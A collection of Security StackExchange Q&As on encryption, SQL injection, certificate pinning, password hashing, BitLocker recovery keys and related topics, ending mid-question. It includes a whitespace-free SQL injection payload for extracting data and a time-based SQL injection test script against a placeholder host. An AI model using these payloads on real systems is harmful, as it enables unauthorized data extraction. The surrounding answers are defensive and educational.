The two options are intended for different use cases. Option 1 is intended for your use case. It encrypts the file with a key derived from a password, so that only the person who knows the password (i.e. most likely the person who encrypted it in the first place) can decrypt it. Option 2 is designed so you can share encrypted files/messages with others. The idea behind it is that you can encrypt the file to someone else's public key, send them the encrypted file, and they (and only they) can decrypt it, without the need of establishing a pre-shared secret password/key between the two of you. Additionally, you can sign the file with your own private key, so that the recipient can confirm that the file did indeed come from you. Of course, you can use this system to encrypt the file to your own key, but as you point out, you would still need a password to decrypt your own private key before decrypting the file (and it would add some (usually negligible) extra computational overhead). Some people might prefer to use this method for encrypting their own files, since it means that, instead of maintaining both systems, they can use the same system for both use cases.
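As an illustration of option 1, a minimal Python sketch using the third-party cryptography package derives a key from the password and encrypts with it; the password, file contents and iteration count are placeholders, not recommendations:

import base64
import os
from cryptography.fernet import Fernet
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC

password = b"correct horse battery staple"   # example only
salt = os.urandom(16)                        # stored next to the ciphertext

kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=salt, iterations=600_000)
key = base64.urlsafe_b64encode(kdf.derive(password))

token = Fernet(key).encrypt(b"contents of the file to protect")
plaintext = Fernet(key).decrypt(token)       # the same password + salt recovers the data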
{ "source": [ "https://security.stackexchange.com/questions/252446", "https://security.stackexchange.com", "https://security.stackexchange.com/users/261412/" ] }
252,464
I have an SQL query like "select * from records where record like '%" + user_input + "%'" My goal here is to get all the records. So far everything I have tried involves using comments to bypass the whitespace filter, but with / and - disabled that did not work. Does this mean my SQL query is safe? Is there any way someone can break my query and view all the records?
Does this mean my SQL query is safe? Is there any way someone can break my query and view all the records? No, it is not safe. More than being able to view all the records of one table, you can pass in: "'AND(EXISTS(SELECT(1)FROM"SECRET_TABLE"WHERE((username='Admin')AND(password_hash='0123456789ABCDEF'))))AND"RECORD"LIKE'" If you get any output then you know that: There is a table called SECRET_TABLE ; That table has the columns USERNAME and PASSWORD_HASH ; and There is a row where the username is Admin and the password hash is 0123456789ABCDEF . And the passed in expression does not use the -*|%/ characters or any whitespace and results in a valid SQL expression. db<>fiddle here A determined attacker could then use this type of query to pull out data from any table the connected user has access to. Don't use string concatenation to include user input into queries; use prepared statements with parameters. For example: "SELECT * FROM table_name WHERE RECORD LIKE '%' || ? || '%'" And pass your dynamic value in as a bind parameter.
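For completeness, a hedged sketch of the parameterized version using Python's built-in sqlite3 module (placeholder syntax varies between database drivers, e.g. ? vs %s):

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE records (record TEXT)")
conn.executemany("INSERT INTO records VALUES (?)", [("alpha",), ("beta",)])

user_input = "' OR 1=1 --"        # treated purely as data, not as SQL
rows = conn.execute(
    "SELECT * FROM records WHERE record LIKE '%' || ? || '%'",
    (user_input,),
).fetchall()
print(rows)                        # [] because the malicious string simply matches nothing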
{ "source": [ "https://security.stackexchange.com/questions/252464", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
252,492
I have an AWS EC2 instance with docker installed, running a default nginx container - docker run -it --rm -d -p 8080:80 --name web nginx . I have an rsyslog setup that successfully captures the auth.log file for the host, so I can capture any login attempts to that machine. However, I'm wondering if there is any way I can capture container login attempts, i.e if someone gains access to the machine and runs docker exec -it web bash . While the container is running, docker logs outputs anything the container is logging to stdout/err. But I haven't found any documentation on container login attempts. Is docker exec the correct way to try "logging in" to the container? Is this something I can feasibly capture? Does it make sense to? When I run docker exec I haven't seen it logged anywhere - host syslog, kernel.log, auth.log, docker logs , nothing at all. So, it doesn't seem like container "logins" are even captured anywhere, and as long as the container is not running with privileged access (as USER root), there is minimal risk. It seems that protecting the host is far more important. More generally, if anyone is in the container poking around, running commands that require root etc., is this logged anywhere on the host? Or do I need to configure rsyslog in the container in order to capture such events. Any insight would be greatly appreciated!
{ "source": [ "https://security.stackexchange.com/questions/252492", "https://security.stackexchange.com", "https://security.stackexchange.com/users/256267/" ] }
252,554
I am trying to understand the security problems when working with a game that needs an account for its players. What is the problem of using a self-signed certificate? If I understand the problem correctly, it's just that if the server private key is compromised, the users will still trust the certificate and the guy that stole the key could steal their passwords. (Until the game updates with the new certificate.) But is that the only problem? And if it is, is it really possible for an attacker to steal the private key from a server with intensive firewalls (just open as few ports as possible)? Here is what I have in mind for my game when a client wants to authenticate: The client encrypts its username and password with RSA using the public key of the self-signed certificate. The client sends this encrypted message to the server. (So here technically only the master server could read the messages, except if the self-signed certificate is compromised.) The server reads the message using its private key from the self-signed certificate. Then the server does classic things: checks in the database if the username exists, then hashes the password with something like bcrypt and checks if the password is correct, then it sets the client in the authenticated state, and the client now has access to other features like joining game servers, accessing the server list, etc. And basically I need to make the clients trust the public key! Because if the master server sends its public key to the client, then a man in the middle could take it, generate a public/private key pair himself and send his own public key. So now the client could think it is talking to the server but instead it is talking to the man in the middle. Am I thinking wrong?
You don't seem to understand the issue with self-signed certificates, so allow me to explain. Generally, when people say "Don't use self-signed certificates!", they mean in the context of a web-server, in which you expect the general public to connect via a web browser. In such a situation, if a self-signed certificate is used, this will lead to an error message: Users will naturally want to ignore the warning and proceed - after all, that's the only way for them to use your website. So if an attacker intercepts the connection and presents his own self-signed certificate, the user would not be able to see that. After all, the error message is seen as a natural part of the process. Self-Signed Certificates in other settings Companies usually have a self-signed certificate as a root-certificate for internal services. This certificate is distributed internally (usually via Active Directory) and thus trusted by all clients. This is a normal setup and works as intended. If an attacker would attempt to intercept the connection, an error would occur, as his certificate would not be trusted. Self-Signed Certificates for your game I assume that you have a server, which manages the game state, and a game client (likely a native client). In this situation, there is nothing wrong with using a self-signed certificate. Simply distribute the certificate with the client and keep the private key on the server. Can the attacker just steal the private key? Only if your server has a vulnerability, which would allow the attacker to do so. But that risk would also exist with a certificate signed by an external certificate authority.
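In practice that usually means shipping the certificate with the client and telling the TLS layer to accept only that one. A rough Python sketch with the requests library, where the host name and the bundled PEM path are placeholders:

import requests

PINNED_CERT = "bundled_master_server_cert.pem"   # self-signed certificate shipped with the game client

resp = requests.post(
    "https://master.example-game.com/login",
    json={"username": "player1", "password": "example"},  # credentials travel inside the TLS session
    verify=PINNED_CERT,                                    # only this certificate is accepted
    timeout=10,
)
print(resp.status_code)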
{ "source": [ "https://security.stackexchange.com/questions/252554", "https://security.stackexchange.com", "https://security.stackexchange.com/users/261592/" ] }
253,771
When it comes to hashing passwords, it is nowadays practice to do 100'000 or 200'000 iterations of SHA256/SHA512, or at least something in that ballpark. But my question is, why is it not safe enough to just do a very small but unusual number of iterations that is unlikely to be guessed? For example, let's say I use 153 iterations of SHA512 to hash the user passwords. Now a hacker breaches the database and steals all password hashes. They will never guess that I'm using exactly 153 iterations and they don't have access to the source code, also nobody will have created a lookup-table for 153, or 267, or 1139 rounds of SHA512 password hashes, correct? (Though lookup-tables are useless anyway if the passwords are salted before hashing)
The idea of a large number of iterations is not to be part of the secret, but to take more time. Having a database with a large number of passwords means someone will have a weak password, and it's trivial to test a dictionary of the 100k worst passwords in minutes, no matter if you are using 200k iterations, or 153 as you are using. A dedicated password cracking device from 2018 achieved 9392.1 MH/s (mega hashes per second) doing SHA256, so trying the 100 worst passwords with every iteration count from 1 to 200,000 would take the attacker just seconds to deduce how many rounds you are using. And there goes all your secrecy. That's why you don't use SHA or MD5 for password storage: they are fast hashes. They are very good for checking the integrity of a download, or the data on the Bitcoin blockchain, but not for password storage. And you should use a tunable hash for that, like Argon2 (as CBHacking reminded me). Compare the 9392.1 MH/s for SHA256 with 43551 H/s for BCrypt with Blowfish, and 124 H/s for Veracrypt PBKDF2-HMAC-Whirlpool + XTS 512 bit. It's not practical to do a dictionary attack with a large-sized dictionary against a decently configured Argon2 password database. The main point of password hashing algorithms is that you can tune them to be as slow as you want, as long as you don't commit a self-inflicted DoS. If you put so many rounds that it takes 10 seconds for your server to process a login request, an attacker can hammer your server with login requests with bogus passwords and essentially kill it.
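A short sketch of what "tunable" looks like in practice, using the Python standard library's hashlib.scrypt; the cost parameters below are illustrative only, and an Argon2 binding would be the preferred choice where available:

import hashlib
import hmac
import os

def hash_password(password, salt=None):
    salt = salt or os.urandom(16)
    # n, r, p control memory and CPU cost and can be raised as hardware improves
    digest = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1, dklen=32)
    return salt, digest

def verify(password, salt, expected):
    return hmac.compare_digest(hash_password(password, salt)[1], expected)

salt, digest = hash_password("hunter2")
print(verify("hunter2", salt, digest))   # True
print(verify("letmein", salt, digest))   # False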
{ "source": [ "https://security.stackexchange.com/questions/253771", "https://security.stackexchange.com", "https://security.stackexchange.com/users/227148/" ] }
253,868
If a site responds with an HTTP 500 Internal Server Error when I send a request containing SQL metacharacters, does that indicate a possible SQL injection vulnerability? If so, is trying to exploit through a time-based injection enough to prove there's a vulnerability in said site?
As stated, the answer to the question is "certainly not", HTTP 500 Internal Server Error is used by pretty much every web server in the world for any uncaught exception, which could be anything from a divide-by-zero to a null pointer dereference to an out-of-memory. It could even be from a database connection without meaning there's a SQLi vulnerability; maybe the developer has a typo in their procedure name or a function sometimes tries to insert a null in a non-optional column. In the specific case that you were attempting SQLi against the server, it's certainly evidence. You'd still want to verify it in a few ways (do queries without any SQL metacharacters always work? Do those with metacharacters always either fail or "work" in a way consistent with the injection?) but it's probably worth trying a few more things, including time-based attacks. However, if a time-based attack attempt just returns a 500 without actually delaying or anything, then you haven't succeeded in an attack, you've just sent a request the developer didn't anticipate and handle correctly by sending a 400 instead. If you want to prove there's a vulnerability, you have to actually exploit it. Get an actual delay, or return an extra value, or log in as the wrong user, or insert spurious data, or whatever. HTTP 500 is literally just "an unspecified error occurred" and doesn't prove anything at all (maybe a passing cosmic ray flipped a bit that caused the exception and it didn't have anything to do with your request at all...). EDIT: Since apparently this isn't clear: a server can also return 500 Internal Server Error (or anything else) in response to any request, at the whim of its programmer. It's just bits on a wire, data sent by a program to a network socket. The spec says it's a catch-all for errors where something went wrong while processing the request and it wasn't a recognized client error, and it's the default response when there's an uncaught exception (though that too can be overridden), but web developers sometimes send it for other situations too.
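As a rough illustration of "get an actual delay", you could compare response times rather than trusting the status code; a hedged Python sketch follows (the URL and payload are placeholders, the delay syntax depends on the backend DBMS, and this must only be run against systems you are authorized to test):

import time
import requests

def timed_get(url):
    start = time.monotonic()
    requests.get(url, timeout=60)
    return time.monotonic() - start

baseline = timed_get("https://target.example/item?id=1")
delayed = timed_get("https://target.example/item?id=1'; WAITFOR DELAY '0:0:10'--")

print(f"baseline {baseline:.1f}s, payload {delayed:.1f}s")
if delayed - baseline > 8:
    print("the response was actually delayed, which is strong evidence of injection")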
{ "source": [ "https://security.stackexchange.com/questions/253868", "https://security.stackexchange.com", "https://security.stackexchange.com/users/264122/" ] }
254,101
This is truly crazy. I received a SPAM email in which there is a URL crafted from apparent Unicode characters that surprisingly exist for italic/bold letters, which when I reported it to Google's spam collector using Thunderbird's Report Spam Email feature it had already been converted to ASCII letters, therefore the URL was not properly reported. Here is the Unicode version: <base href="http://.COM"> Notice! These characters are bold/italic NOT because I selected to make them so, but because Unicode bizarrely contains bold/italic letters. See the hex values here: 0011660 e > < / t i t l e > < b a s e sp 3e65 2f3c 6974 6c74 3e65 623c 7361 2065 e > < / t i t l e > < b a s e 0011700 h r e f = " h t t p : / / p gs em 7268 6665 223d 7468 7074 2f3a f02f 999d h r e f = " h t t p : / / 360 235 231 0011720 * p gs em / p gs em # p gs em em p gs em f0aa 999d f0af 999d f0a3 999d f099 999d 252 360 235 231 257 360 235 231 243 360 235 231 231 360 235 231 0011740 ' p gs em sub p gs em ( p gs em ( . C O f0a7 999d f09a 999d f0a8 999d 2ea8 4f43 247 360 235 231 232 360 235 231 250 360 235 231 250 . C O Can a URL actually contain these Unicode characters, or will all browsers convert them to ASCII? Whether ASCII or Unicode, ping resolves this to 185.86.76.164. Why do these Unicode characters exist in the first place? Whoever requested bold/italic letters?
What you have here are mathematical symbols, see output from unicode text analyzer (codepoint, name, number of fonts, script):
U+1D66A MATHEMATICAL SANS-SERIF BOLD ITALIC SMALL U (12, Common)
U+1D66F MATHEMATICAL SANS-SERIF BOLD ITALIC SMALL Z (12, Common)
U+1D663 MATHEMATICAL SANS-SERIF BOLD ITALIC SMALL N (12, Common)
U+1D659 MATHEMATICAL SANS-SERIF BOLD ITALIC SMALL D (12, Common)
U+1D667 MATHEMATICAL SANS-SERIF BOLD ITALIC SMALL R (12, Common)
U+1D65A MATHEMATICAL SANS-SERIF BOLD ITALIC SMALL E (12, Common)
U+1D668 MATHEMATICAL SANS-SERIF BOLD ITALIC SMALL S (12, Common)
U+1D668 MATHEMATICAL SANS-SERIF BOLD ITALIC SMALL S (12, Common)
These symbols are considered equivalent in terms of Unicode to the respective "normal" characters, i.e. u, z, n, ... . When dealing with a URL containing Unicode, clients will first do such a Unicode normalization step, and if it still contains non-ASCII characters after that (not the case here), it will encode it as Punycode . ... it had already been converted to ASCII letters, therefore the URL was not properly reported Since it was correctly normalized, it is the actual relevant URL as a browser would access it. Thus it was properly reported. But it is even more complicated than this fairly simple explanation. For the details see the answer from IMSoP .
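You can reproduce the normalization step with the Python standard library alone; the sketch below rebuilds the string from the code points listed above rather than pasting the glyphs directly:

import unicodedata

fancy = "".join(chr(cp) for cp in
                (0x1D66A, 0x1D66F, 0x1D663, 0x1D659, 0x1D667, 0x1D65A, 0x1D668, 0x1D668))
ascii_form = unicodedata.normalize("NFKC", fancy)
print(ascii_form)             # the plain ASCII letters u, z, n, d, r, e, s, s
print(ascii_form.isascii())   # True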
{ "source": [ "https://security.stackexchange.com/questions/254101", "https://security.stackexchange.com", "https://security.stackexchange.com/users/264343/" ] }
254,257
I created my own anti-adblock system, that does something similar to services like BlockAdblock except mine goes about Adblocker detection in a different manner (and so far cannot be bypassed like ones such as BlockAdblock). If you go to my Anti-Adblocker's page and generate some example anti-adblock code you'll notice it's all obfuscated (BlockAdblock also does this) which I've done to make it harder for filters and bypassing methods to be developed for it. The code cannot be unobfuscated or tampered with/edited (doing so will cause it to not work). Each generation of this obfuscated anti-adblock code is unique, but they all perform the same action. I can see that some potential users of my tool may not trust it, as they can't determine exactly how it works - Am I able to prove to my users that the generated code is not malicious without revealing the actual unobfuscated source? (because if I were to reveal the unobfuscated source code it would defeat the whole purpose of obfuscating in the first place)
How can I prove to users that my obfuscated code is not malicious without unobfuscating? Probably, you can't. Maybe, if trusted persons were willing to audit your code (subject to NDA etc) and sign a static release with their PGP keys, then possibly more people would be willing to install your script with the confidence that it has been vetted by people who know what they are talking about... In this world everything is based on trust and reputation . So my advice, if you want to pursue a career in programming, would be to establish that trust and build your reputation from now on. Consider doing some open source code too , and publish it on platforms like GitHub with a liberal license. And I think you already have a few repos on GitHub actually, so don't hesitate to link to your previous work. If people can see your history and evaluate the quality of your coding practices (though terrifying when you think about it, these are the rules of the game...), they might be more willing to trust your code. Maybe one day you will work in a software company, or create one, and you will sell closed-source, compiled code like MS-Windows. If your reputation is good enough, if your product is good enough, stable and priced right, your customers will accept it just like they buy other software products they need even though they will never see the source code. Just curious, but have you tried online JavaScript deobfuscators like this one for example? Is your code sufficiently obscure yet after going through those tools? What you have achieved is still security by obscurity, and JavaScript code can be traced with debuggers too. So, someone who has time on their hands and enough experience can figure out how it works. After all, this is client-side code which is not even compiled. This can't be the most difficult reverse engineering job assignment on Earth. I wouldn't worry too much about this at this point, my worry is rather that your invention is time-sensitive , and could even be rendered obsolete by a future version of Firefox or Chrome etc. Defeating adblockers is a never-ending race and everything you make in this area has a limited shelf life.
{ "source": [ "https://security.stackexchange.com/questions/254257", "https://security.stackexchange.com", "https://security.stackexchange.com/users/244539/" ] }
254,383
Recently I got into an exchange with someone on social media about the security of Linux versus OSX and Windows. I stated that it is possible (and probable) that someone could code a low level back door ( or whatever pesky malware they desire), and put it into the open source Linux code they downloaded, as well as add all of the proprietary software that Ubuntu has; compile it to an iso and label it as “UbuNtU”. This new iso would install an OS that would look and feel like the real ubuntu, however it would have a back door that nobody could see. This would require a faked checksum as well, but that is somewhat besides the point because it can be faked too. (also the user might be just given a usb from a trusted source with the fake iso). My question is straightforward, could somebody create a fake Ubuntu with a back door by compiling the open source software into an iso and labeling it as “UbUnTu”. I would also like to add that this can be done with OSX and Windows however it would be much more difficult due to that fact that neither of these are open source! I strongly believe that open source software is more vulnerable to hackers point blank!
Whether an OS is open source or not is not the important factor in whether someone could build a malicious installer image. Recent versions of Windows use a technique that is based on WIM images, which can be generated from existing Windows installations just like a backup software creates an image. Therefore it is pretty easy to generate a malicious Windows image: just capture an existing Windows installation that has been prepared with malware. The same is true for Linux-based OSes like Ubuntu. Therefore, no matter what OS you install, it is important to only use installer or ISO images that are downloaded directly from a trusted source using a secure channel like HTTPS, usually directly from the manufacturer, or whose authenticity you can verify, e.g. using a GPG signature.
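As part of that verification, checking the image against the published checksum is easy to script; a small Python sketch (the file name and expected hash are placeholders, and ideally you also verify the GPG signature on the checksum file itself):

import hashlib

EXPECTED_SHA256 = "0123...abcd"                     # value from the vendor's SHA256SUMS file
iso_path = "ubuntu-22.04-desktop-amd64.iso"         # example file name

h = hashlib.sha256()
with open(iso_path, "rb") as f:
    for chunk in iter(lambda: f.read(1 << 20), b""):
        h.update(chunk)

print("OK" if h.hexdigest() == EXPECTED_SHA256 else "MISMATCH - do not install")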
{ "source": [ "https://security.stackexchange.com/questions/254383", "https://security.stackexchange.com", "https://security.stackexchange.com/users/264865/" ] }
254,412
I've worked at places where the admins have disabled desktop personalization on Windows for settings like: changing desktop background and lock screen images; local themes (no high contrast, for example); fonts. What are the risks of these settings?
Changing them to other Windows defaults would pose no security risk. Allowing people to install fonts or screensavers from third parties poses a HUGE security risk. However, it's most likely these things are locked down not for security reasons but for conformity reasons. If you are rolling out thousands of computers, fewer options mean fewer things to troubleshoot down the road. If you can't change the screen contrast, you will never get a phone call to tech support saying that the screen contrast is "broken". More Information on Malicious Fonts
{ "source": [ "https://security.stackexchange.com/questions/254412", "https://security.stackexchange.com", "https://security.stackexchange.com/users/206426/" ] }
254,503
I have certificate pinning implemented in my iOS and Android apps. But when the apps were pen-tested, we got a report from the pentester saying the SSL implementation is weak in both apps and can be easily bypassed using an SSL bypass tool. For iOS it was revealed that the SSL bypass tool was the notorious SSL Kill Switch 2 app. Now as far as I have googled, the SSL Kill Switch 2 app exploits an OS-level weakness to bypass the pinning check altogether. Our team is looking into solutions to prevent or at least detect the bypassing. And one of the solutions proposed was to use public key pinning instead of certificate pinning. Now as per my understanding, since SSL Kill Switch 2 works on the OS level, it doesn't matter if we pin the certificate or the public key (or public key hash); it's always going to be bypassed. So I wanted the advice of someone who has gone through this situation or has the expertise. Is it worth implementing public key (or public key hash) pinning instead of certificate pinning? Does my app stand a chance against the pentest after the change?
Unless you specified that your software has to be secure against TLS interception even in the case of a jailbroken/rooted machine - which I hope you didn't, because that's impossible and a fool's errand to attempt - your pentester has... no idea what they're talking about and I hope you didn't pay them much for it. SSL Kill Switch 2 isn't a weakness in your SSL implementation, and it isn't a vulnerability in general. It's a tool for - on a fully rooted device - straight-up modifying your app's use of system libraries. It in no way qualifies as an app vulnerability, for the following reasons: The "attacker" needs to already have control of the operating system (not even normal user control, but actually root privileges). There is no possibility of securing a user-space app against a malicious OS. It requires malicious action on the part of the ostensible victim of any attack (the user, whose app login tokens or whatever are supposedly at risk). Unless you're trying to keep stuff in your app secret even from the user of jailbroken phones - which, again, indicates some bad choices in your design, and a lot of wasted time in your future trying to implement unspoofable jailbreak detection and/or snake-oil code obfuscation - pinning is to protect the user; it's incoherent to think of them as the attacker of their own secrets. The actual attackers can't do this. On a non-jailbroken phone, apps can't modify each other (or system libraries) at all. Even on a jailbroken phone, apps are still secure against remote attacks (at least, to the extent that the OS is secured against remote code execution in general; if the user has SSH enabled with a weak password, that's a vulnerability but it isn't your vulnerability). An "SSL pinning bypass" implies that an attacker is able to get your app to make an insecure connection, and even jailbreaking doesn't do that unless the attacker's code is already executing on the device. There's nothing wrong with your code. It's quite reasonable to assume that your app will operate in an environment where the system TLS APIs do, in fact, create secure connections (and allow you to pin the cert or key of the server, as per their API contract). You could do something like bundle your own copy of OpenSSL and use that for the connection, instead of the system library, but you don't need to and it wouldn't really help anyhow (the "pentester" would just modify that instead). Don't get me wrong, actual pentesters test on jailbroken devices specifically so they can do things like run SSL Kill Switch and disable pinning (or TLS in general). But that doesn't go in the report as a vulnerability. It's a way to find vulnerabilities - such as that your app is using hardcoded secrets, or is vulnerable to deserialization attacks, or that your server is vulnerable to an authorization bypass, or so on - but it isn't itself a vuln. Saying it is would be like saying a web app is vulnerable to XSS because the user can install an extension that injects scripts into the page. This is obvious, unavoidable, not your fault, and outright stupid to flag as an issue unless you're somehow trying to hide secrets even from the app's users.
{ "source": [ "https://security.stackexchange.com/questions/254503", "https://security.stackexchange.com", "https://security.stackexchange.com/users/264644/" ] }
254,576
Why don't some services offer Google/Facebook/Apple/Twitter login? Namely Crypto exchanges. I assume they want as many users as possible & this is a great way to get more. Is there some sort of security vulnerability associated with them? Edit: For Google & Apple login since both offer email services (gmail & icloud), offering the login button for these is the same thing as asking them to verify their email address. Assuming all you do on the login buttons is get the verified email address (which is all you need). Of course you'd still want 2FA
There are a variety of reasons that a company may not want to offer a federated login option. Some of them include the following: People don't necessarily protect their social media accounts very well. A company may want the ability to require a strong password or 2FA to log in, and that's harder to do when you use a third-party login. Also, services may not want the compromise of your social media account to be a compromise of their account. Some third-party login providers provide access to email addresses, and some don't. Apple uses a custom email. For situations where a service needs access to an email, whether for reasons of identity (e.g., GitHub and associating commits with accounts), fraud and abuse prevention, or less ethical reasons (e.g., non-confirmed opt-in marketing or other types of spam), a third-party login may not be sufficient. Depending on the way the third-party login provider works, you may end up with only a username, or a fixed ID as a result of the login information. If you store the username and not the ID, then you have a problem if the original owner deletes their account and someone else creates one named the same thing. If you don't implement third-party login, this doesn't happen. In the specific case of cryptocurrency exchanges, typically you are going to have to provide some sort of financial information to conduct business, and often additional information for local know-your-customer requirements. In many jurisdictions, these laws are very strict. Since you are already providing a good deal of information, much of which is quite sensitive, a custom username and password wouldn't be seen as very burdensome. Some services are highly regulated and must meet audit requirements, such as those from companies working in the financial industry or those selling to governments. These audits take a long time, involve a lot of personnel, and tend to be extraordinarily expensive. Adding third-party login increases the scope of the audit and makes other people's security or compliance problems the company in question's problems, and they would like to avoid that. Of course, these are some general reasons. Individual companies may have other reasons, but we have no way of knowing what they are.
{ "source": [ "https://security.stackexchange.com/questions/254576", "https://security.stackexchange.com", "https://security.stackexchange.com/users/124704/" ] }
254,635
While doing some encryption work on drives I found that BitLocker keeps making these "recovery keys". No other encryption software I used did that so it annoyed me and made me biased perhaps. While laboring with safe storage of these "recovery keys", I suddenly realized how small they looked and now I started suspecting a more serious problem. I searched for how they worked and found the post How does Microsoft's BitLocker Recovery Code work? . It says it is just another encryption key, like the password. Now my passwords are 128-character alphanumerics with special characters that I generate using algorithms with some random input (e.g., my mouse movements). My estimate is that it is 7 bit per character = 896 bits. If half of it is random, the key is way above 256 bits and suits the industrial standards. The recovery key on the other hand is 48 digits, at most log 2 (10^49) = 163 bit, if my math is correct. A 163-bit key seems mighty small and is certainly not up to an industrial standard of 256 bit. But then something else struck me. When generating the key I didn't move neither my mouse, nor pressed keys, nor was my computer connected to the Internet. What else could Windows use for randomness? Thermistors on the chipset? Too slow, the key was printed out within a few seconds. So it must be a pseudorandom 163-bit key. The time to crack anything below 128 random bits falls off the cliff so under the worst case scenario it could be cracked very quickly using regular GPUs. So it adds up to two questions: Can a BitLocker-locked drive be brute-forced within hours by guessing the recovery key by an actor with a supercomputer? With a couple of GPUs? (assuming Microsoft put as much effort as possible into that pseudo-random recovery key and didn't insert any back doors by reducing the already-miserable amount of randomness there) Is there an option to disable BitLocker recovery keys? Answer to question 2. (I hope) I found a way to disable the recovery keys! In Windows, search Run → gpedit.msc → Computer Configuration → Administrative Template → Windows Components → BitLocker Drive Encryption → Fixed/Removable Data Drives → Choose how fixed/removable drives can be recovered . Reboot. Recreate the drives. I was happy about my discovery for a minute, but I realized if the answer to question 1 is yes, it might just create the recovery key in the background, but never display, save, or log it. The vulnerability would work just the same. I was actually not able to disable the recovery key entirely. BitLocker just fails with an error saying there is no option to create a recovery key. I did switch to the 256-bit recovery key, which somebody on some forum says ought to be FIPS compliant. It saves it as a hidden system file on a USB disk.
Can a Bitlocker-locked drive be brute-forced within hours by guessing the recovery key by an actor with a supercomputer? With a couple of GPUs? (assuming Microsoft put as much effort as possible into that pseudo-random recovery key and didn't insert any backdoors by reducing the already-miserable amount of randomness there) Not even remotely. First of all, you say "miserable amount of randomness" but that, frankly, just belies that you have no idea what large amounts of entropy are like. 256-bit encryption is common not because 128-bit is insecure, but because 256-bit is fast enough on modern CPUs that there's no reason to use smaller keys. It is, however, an ABSURD amount of overkill from a security perspective, at least against conventional computers (it might be meaningfully more secure against quantum computers, if those ever get anywhere). 128 bits of entropy means 2^128 possibilities, and 128 bits of entropy is still an extremely common cryptographic key strength (though depending on the algorithm, this sometimes requires the keys to be longer than 128 bits). 2^128 is about 3.4 * 10^38 (EDIT: fixed a typo in the math) . To consider how many that really is, in terms of total computation required, consider: For certain kinds of operations, the most common supercomputers today are GPUs; for example, a high-end modern GPU can compute tens of billions (10^10) of cryptographic hashes per second. Let's suppose, for the moment, that you could break a BitLocker recovery key by computing 2^128 SHA1 cryptographic hashes. (This is almost certainly false, even if the keys actually only have 2^128 entropy, much less any more.) Let's further suppose that you are the NSA or some such, and can buy up the entire annual production of high-end GPUs ( somebody is buying them all, these days...). Let's say it's about 38 million (this is actually almost certainly too high; it's a decent guess for the total number of GPUs, most of which are way less powerful than the high-end ones). So, 38M (3.8 * 10^7) powerful GPUs, each capable on average of 10^10 SHA1 operations per second. That's a total of 3.8*10^17 hashes per second. That's still about a factor of 10^21 seconds! How long is that? Almost 32 trillion years , which is roughly 2500 times as long as the universe has existed so far. Let's be honest, you can't afford to wait 2500 times the current age of the universe. Nor can your attacker. They might be able to shave a couple orders of magnitude off that estimate by buying specialized hardware rather than off-the-shelf processors, but even if they manage a speedup of 1000x... that's still multiple age-of-the-universe lifetimes. Just to perform one operation 2^128 times. Using several billion dollars worth of hardware. I think your recovery key will be OK . Is there an option to disable Bitlocker recovery keys? In addition to the option you already found that makes Windows not force there to be a key created each time you use the BitLocker GUI, you can also delete "protectors" including the recovery key using the command-line manage-bde.exe tool. manage-bde -protectors -delete C: -Type RecoveryPassword Just, before you run off to execute that little command, take a break to consider. After all, you've got more than a few age-of-the-universe timescales to consider it in.
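For anyone who wants to reproduce the back-of-the-envelope arithmetic above, a tiny Python snippet (all figures are the rough assumptions stated in the answer, not measurements):

keyspace = 2 ** 128                      # ~3.4e38 possible keys
gpus = 3.8e7                             # hypothetical 38 million GPUs
hashes_per_gpu = 1e10                    # ~10 billion hash operations per second each

seconds = keyspace / (gpus * hashes_per_gpu)
years = seconds / (3600 * 24 * 365.25)
print(f"{seconds:.2e} seconds, roughly {years:.2e} years")   # on the order of 1e21 s / 1e13 years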
{ "source": [ "https://security.stackexchange.com/questions/254635", "https://security.stackexchange.com", "https://security.stackexchange.com/users/155724/" ] }
254,644
I am an Open Banking enthusiast and I'm studying the Berlin Group's XS2A framework these days. The framework has an error code called CERTIFICATE_BLOCKED, whose description states, "Signature/corporate seal certificate has been blocked by the ASPSP or the related NCA." What I need to understand is the difference between certificate "blocking" and revoking. I understand the concept of why certificate authorities revoke certificates, and we can also validate certificate revocation status using OCSP and CRL endpoints online. Here is what I need to understand: What is the difference between certificate "blocking" and "revoking"? Is blocking temporary? Can a blocked certificate be unblocked by a CA or an ASPSP (ASPSP is the term for a bank in the Open Banking context)? Can anyone block a certificate (ASPSP/NCA)? Is there a way to check the certificate blocking status, like OCSP and CRL endpoints? PS: I've also looked up RFC 5280, hoping there might be an explanation, but I couldn't find anything about certificate blocking other than in the XS2A Berlin Open Banking specification.
{ "source": [ "https://security.stackexchange.com/questions/254644", "https://security.stackexchange.com", "https://security.stackexchange.com/users/257252/" ] }
254,940
Opening a PDF link in the browser (e.g. google chrome with the ootb PDF viewer plugin) apparently indicates that when the PDF is hosted on a cloudflare-facing domain there is additional data present in the embed code. Inspecting the page source of a displayed PDF file with chrome dev tools shows some 'reporting' URL when the PDF is behind cloudflare e.g. https://a.nel.cloudflare.com/report/v3?s=%2BW057P981N7Esg... (see the second code block). PDF embed of a file NOT served via cloudflare: <embed id="plugin" type="application/x-google-chrome-pdf" src="https://www.w3.org/WAI/ER/tests/xhtml/testfiles/resources/pdf/dummy.pdf" stream-url="chrome-extension://mhjfbmdgcfjbbpaeojofohoefgiehjai/f02f891e-7fd9-4857-8a34-f4e05abb87f8" headers="accept-ranges: bytes cache-control: max-age=21600 content-length: 13264 content-type: application/pdf; qs=0.001 date: Sun, 05 Sep 2021 08:17:57 GMT etag: &quot;33d0-438b181451e00&quot; expires: Sun, 05 Sep 2021 14:17:57 GMT last-modified: Mon, 27 Aug 2007 17:15:36 GMT strict-transport-security: max-age=15552000; includeSubdomains; preload x-backend: ssl-mirrors " background-color="4283586137" javascript="allow" full-frame="" pdf-viewer-update-enabled=""> PDF embed for a file that IS served via cloudflare: <embed id="plugin" type="application/x-google-chrome-pdf" src="https://www.cloudflare.com/static/839a7f8c9ba01f8cfe9d0a41c53df20c/cloudflare-cdn-whitepaper-19Q4.pdf" stream-url="chrome-extension://mhjfbmdgcfjbbpaeojofohoefgiehjai/fab5433b-5189-4469-91bb-fe144b761c7f" headers="accept-ranges: bytes age: 105287 alt-svc: h3-27=&quot;:443&quot;; ma=86400, h3-28=&quot;:443&quot;; ma=86400, h3-29=&quot;:443&quot;; ma=86400, h3=&quot;:443&quot;; ma=86400 cache-control: max-age=8640000 cf-cache-status: HIT 